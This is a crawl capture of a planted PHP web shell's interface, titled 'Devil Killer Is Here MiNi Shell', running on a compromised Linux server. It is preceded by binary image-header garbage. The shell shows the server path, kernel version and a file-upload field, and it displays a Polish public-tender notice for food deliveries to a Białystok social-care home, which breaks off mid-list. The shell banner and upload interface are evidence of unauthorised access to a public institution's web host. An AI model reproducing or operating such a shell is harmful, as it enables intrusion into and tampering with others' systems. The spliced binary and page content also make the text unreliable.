JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211213/0031223101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa produktów żywnościowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000304674</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Świerkowa 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białystok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">15-328</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dps.bialystok.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dps.bialystok.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> jednostka samorządowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa produktów żywnościowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c1dc278c-59a1-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00312231</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001105/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa artykułów żywnościowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.dps.bialystok.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl ePuap /dpsbialystok/SkrytkaESP sekretariat@dps.bialystok.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://miniportal.uzp.gov.pl ePuap /dpsbialystok/SkrytkaESP sekretariat@dps.bialystok.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DGO/341p-2/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Dorsz atlantycki (Gadus morhua) filet b/sk SHP, 8-16 oz. bez glazury bez chemii. Morska produkcja.	kg	100<br/>2.	Farsz rybny z bramy, miruny (jasny)	kg	30<br/>3.	Filet śledziowy Matias luz Premium a 5 kg	kg	120<br/>4.	Filet z makreli w oleju 170g konserwa	szt.	100<br/>5.	Filet z makreli w pomidorach 170g konserwa	szt.	100<br/>6.	Filet zapiekany z serem (min 44 % ryby)	kg	100<br/>7.	Makrela wędzona 300-500 g	kg	2<br/>8..	Mintaj (Theragra chalcogramma) filet b/s SHP, 6-8 oz. bez glazury, bez chemii.	kg	50<br/>9.	Miruna (Macruronus novaezelandiae) filet z/s SHP, bez glazury 8-12 oz. Morska produkcja kg	200<br/>10.	Morszczuk (Merluccius hubsi) filet b/s SHP, bez glazury, Argentyna 300-400 g. Morska produkcja	kg	30<br/>11.	Opiekane rolmopsy śledziowe w galarecie min (50% ryby)	kg	50<br/>12.	Opiekane rolmopsy śledziowe w sosie pomidorowym min (50% ryby)	kg	100<br/>13.	Pasty kanapkowe 80 g z dodatkiem ryb, grzybów Pastella Lisner	szt.	1000<br/>14.	Płat śledziowy marynowany z/sk a 4 kg	kg	10<br/>15.	Ryba faszerowana w galarecie 260 g	szt.	450<br/>16.	Sałatki śledziowe 150 g	szt.	500<br/>17.	Tuńczyk kawałki w oleju 170 g	szt.	150 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03311000-2 - Ryby</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Ananas mrożony kostka	kg	5<br/>2.	Brokuły op. 10kg	kg	240<br/>3.	Brukselka	kg	10<br/>4.	Brzoskwinia kostka op. 10 kg	kg	20<br/>5.	Bukiet królewski(3 składnikowy)op.2,5kg	kg	210<br/>6.	Cukinia plastry falista op. 2,5 kg	kg	2<br/>7.	Dynia mrożona kostka op.2,5 kg	kg	2<br/>8.	Fasola szparagowa mrożona żółta cięta op. 10kg	kg	100<br/>9.	Fasolka szparagowa mrożona zielona op. 10kg	kg	150<br/>10.	Groszek zielony op. 10kg	kg	20<br/>11.	Kalafior mrożony op. 10kg	kg	250<br/>12.	Kartacze z mięsem	kg	70<br/>13.	Knedle z owocami- różne	kg	50<br/>14.	Malina mrożona	kg	2<br/>15.	Marchew kostka op. 10kg	kg	100<br/>16.	Mieszanka 7 skład. op.10kg	kg	120<br/>17.	Mieszanka kompotowa 4 składnikowa op. 10kg	kg	250<br/>18.	Morele mrożone kostka	kg	5<br/>19.	Papryka trio mrożona 2,5 kg	kg	5<br/>20.	Pierogi z kapustą i grzybami np. Virtu	kg	5<br/>21.	Pierogi z mięsem np. Virtu	kg	25<br/>22.	Pierogi z owocami (truskawka, jagoda, jabłko )	kg	25<br/>23.	Pierogi z serem np. Virtu	kg	25<br/>24.	Porzeczka czarna mrożona op. 10kg	kg	500<br/>25.	Pyzy ziemniaczane	kg	10<br/>26.	Pyzy ziemniaczane z mięsem np. Chłodnia Białystok	kg	30<br/>27.	Szpinak mrożony brykiet	kg	60<br/>28.	Śliwka b/ pestki op. 2,5 kg	kg	5<br/>29.	Truskawki mrożona op. 10kg	kg	120<br/>30.	Warzywa na patelnię z ziemniakami	kg	50<br/>31.	Wiśnie b/pestek op. 2,5 kg	kg	50<br/>32.	Włoszczyzna 3 składnikowa paski	kg	30 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15896000-5 - Produkty głęboko mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Chleb baltonowski krojony 600g	szt.	9000<br/>2.	Chleb wileński krojony 400g	szt.	1500<br/>3.	Chleb żytni razowy 500g	szt.	2250<br/>4.	Chleb wieloziarnisty krojony 500g	szt.	1120<br/>5.	Chleb mieszany pytlowy trzy ziarna 500g.krojony	szt.	1700<br/>6.	Chleb mieszany z siemieniem lnianym 500 g krojony	szt.	500<br/>7.	Bułeczki wrocławskie 50 g	szt.	26500<br/>8.	Paluch wyborny 75g	szt.	10<br/>9.	Bułeczki graham 80g	szt.	2300<br/>10.	Bułeczki żytnie 60g	szt.	2050<br/>11.	Chałka zdobna 200g	szt.	450<br/>12.	Pączki w cukrze pudrze 50g	szt.	188<br/>13.	Bułka z marmoladą/ślimak 90g	szt.	220<br/>14.	Paluszki z cynamonem 80g	szt.	220<br/>15.	Wstążka jabłkowa	szt.	220<br/>16.	Bułka z serem 80g	szt.	220<br/>17.	Bułka maślana 30g	szt.	150<br/>18.	Bułeczka wiejska/ swojska 80g	szt.	200<br/>19.	Bułeczka z żurawiną 40g	szt.	230<br/>20.	Bułeczka babuni z kruszonką 60g	szt.	170<br/>21.	Drożdżówka / Placek z kruszonką ok.320 g	szt.	50<br/>22.	Bułeczki słodkie waniliowe 50g	szt.	220<br/>23.	Bułeczki z budyniem/ lemonka 80g	szt.	220<br/>24.	Cebulak/ Bułka margerita 100 g	szt.	250<br/>25.	Bułeczka jagodzianka 80g	szt.	220<br/>26.	Bułeczka musli	szt.	30<br/>27.	Chleb bezglutenowy codzienny (jasny, ciemny) np. Balviten	kg	5<br/>28.	Ciasto przekładane porzeczkowe	kg	47<br/>29.	Makowiec	kg	47<br/>30.	Babka piaskowa	kg	47<br/>31.	Ciasto ”Królewiec”	kg	47<br/>32.	Ciasto śliwkowe	kg	47<br/>33.	Ptasie mleczko	kg	47<br/>34.	Przekładaniec (weneckie)	kg	47<br/>35.	Sernik	kg	50<br/>36.	Ciasto bankietowe	kg	47<br/>37.	Rolada z kremem i galaretką	kg	47<br/>38.	Babeczka wielkanocna	szt.	188<br/>39.	Ciasto krówka	kg	47 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Drożdże piekarnicze	kg	17<br/>2.	Jogurt kremowy z owocami 122g Fantazja-różne smaki	szt.	200<br/>3.	Jogurt naturalny 150 g	szt.	3200<br/>4.	Jogurt naturalny 350 g	szt.	60<br/>5.	Jogurt owocowy 150 g różne smaki	szt.	1350<br/>6.	Jogurt pitny naturalny 250 g	szt.	60<br/>7.	Jogurt pitny smakowy 250 g różne smaki	szt.	600<br/>8.	Jogurt pitny smakowy różne smaki b/ cukru 250g	szt.	300<br/>9.	Kefir 1,8%-3% tłuszczu 400 g	szt.	200<br/>10.	Margaryna zwykła 250 g 60% tłuszczu	szt.	350<br/>11.	Masło roślinne 250g	szt.	2<br/>12.	Masło śmietankowe stołowe 200 g 82% tłuszczu	szt.	6000<br/>13.	Mleko 2% luz, opakowanie 5 l	l	10500<br/>14.	Ser Favita 12% tł 270g	szt.	5<br/>15.	Ser Mozzarella Classic 125 g	szt.	5<br/>16.	Ser pleśniowy naturalny 125g	szt.	5<br/>17.	Ser żółty typu holenderskiego	kg	60<br/>18.	Ser żółty lekki 16% tł. W suchej masie	kg	15<br/>19.	Ser żółty rolada ustrzycka	kg	75<br/>20.	Ser żółty typu salami	kg	75<br/>21.	Ser żółty typu szwajcarskiego	kg	75<br/>22.	Serek homogenizowany 150 g - różne smaki	szt.	500<br/>23.	Serek homogenizowany bez laktozy naturalny 150 g	szt.	150<br/>24.	Serek kanapkowy twarogowy 150 g - różne smaki	szt.	650<br/>25.	Serek mascarpone 250 g	szt.	2<br/>26.	Serek mazowiecki topiony kremowy 100g - kiełbaska	szt.	300<br/>27.	Serek topiony 100 g różne smaki	szt.	900<br/>28.	Serek topiony 140 g krążki mix smaków	szt.	600<br/>29.	Serek topiony plastry 130 g - różne smaki	szt.	300<br/>30.	Serek twarogowy ziołowy/ naturalny 150g np.. Deliser	szt.	160<br/>31.	Serek wiejski lekki 150 g	szt.	250<br/>32.	Serek wiejski smakowy 150 g	szt.	350<br/>33.	Śmietana 18% 400 g	szt.	1650<br/>34.	Śmietanka UHT 30% tł 330 ml	szt.	2<br/>35.	Twaróg capri	kg	150<br/>36.	Twaróg półtłusty, krajanka	kg	900 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Agrest	kg	1<br/>2.	Arbuz	kg	350<br/>3.	Banany	kg	500<br/>4.	Borówka amerykańska	kg	1<br/>5.	Botwina	kg	1<br/>6.	Brokuł	szt.	25<br/>7.	Brukselka	kg	2<br/>8.	Brzoskwinie	kg	100<br/>9.	Burak ćwikłowy	kg	750<br/>10.	Cebula	kg	600<br/>11.	Cebula czerwona	kg	30<br/>12.	Cytryny	kg	350<br/>13.	Czereśnie	kg	2<br/>14.	Czosnek główka	szt.	60<br/>15.	Fasolka szparagowa	kg	20<br/>16.	Gruszki	kg	500<br/>17.	Jabłka	kg	2000<br/>18.	Kalafior świeży	szt.	30<br/>19.	Kapusta biała	kg	800<br/>20.	Kapusta czerwona	kg	120<br/>21.	Kapusta kwaszona	kg	420<br/>22.	Kapusta młoda	szt.	150<br/>23.	Kapusta pekińska	kg	200<br/>24.	Kiwi	kg	1<br/>25.	Koper	kg	40<br/>26.	Maliny	kg	1<br/>27.	Mandarynki	kg	300<br/>28.	Marchew	kg	2550<br/>29.	Melon żółty miodowy	kg	2<br/>30.	Morele	kg	30<br/>31.	Natka pietruszki	kg	18<br/>32.	Nektarynki	kg	150<br/>33.	Ogórki gruntowe	kg	200<br/>34.	Ogórki kwaszone	kg	450<br/>35.	Ogórki szklarniowe,sałatkowe	kg	550<br/>36.	Papryka czerwona,żółta	kg	300<br/>37.	Pieczarki	kg	150<br/>38.	Pietruszka korzeń	kg	300<br/>39.	Pomarańcze	kg	400<br/>40.	Pomidory	kg	1300<br/>41.	Por	kg	200<br/>42.	Porzeczka czerwona, czarna	kg	10<br/>43.	Przyprawa-koper do ogórków	szt.	15<br/>44.	Roszponka	kg	1<br/>45.	Rukola	kg	1<br/>46.	Rzepa sopel	kg	180<br/>47.	Rzodkiewka	szt.	550<br/>48.	Sałata lodowa	szt.	350<br/>49.	Sałata mix	szt.	3<br/>50.	Sałata zielona	szt.	650<br/>51.	Seler korzeń	kg	500<br/>52.	Seler naciowy	kg	1<br/>53.	Susz owocowy	kg	2<br/>54.	Szczypior	szt.	700<br/>55.	Szpinak	kg	3<br/>56.	Śliwki	kg	150<br/>57.	Truskawki	kg	150<br/>58.	Winogrona	kg	3<br/>59.	Wiśnie	kg	10<br/>60.	Ziemniaki	kg	11500<br/>61.	Ziemniaki młode	kg	3000 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03220000-9 - Warzywa, owoce i orzechy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Ananas puszka plastry 580g	szt.	120<br/>2.	Baton bezglutenowy Raw 50g	szt.	2<br/>3.	Baton owocowy bez cukru Raw 35 g	szt.	1050<br/>4.	Bazylia 10g	szt.	25<br/>5.	Beskidzkie mini krakersy 100g	szt.	1400<br/>6.	Biszkopty b/ cukru 100g np.. Mamut	szt.	220<br/>7.	Biszkopty bezglutenowe 85 g	szt.	5<br/>8.	Biszkopty Leonki 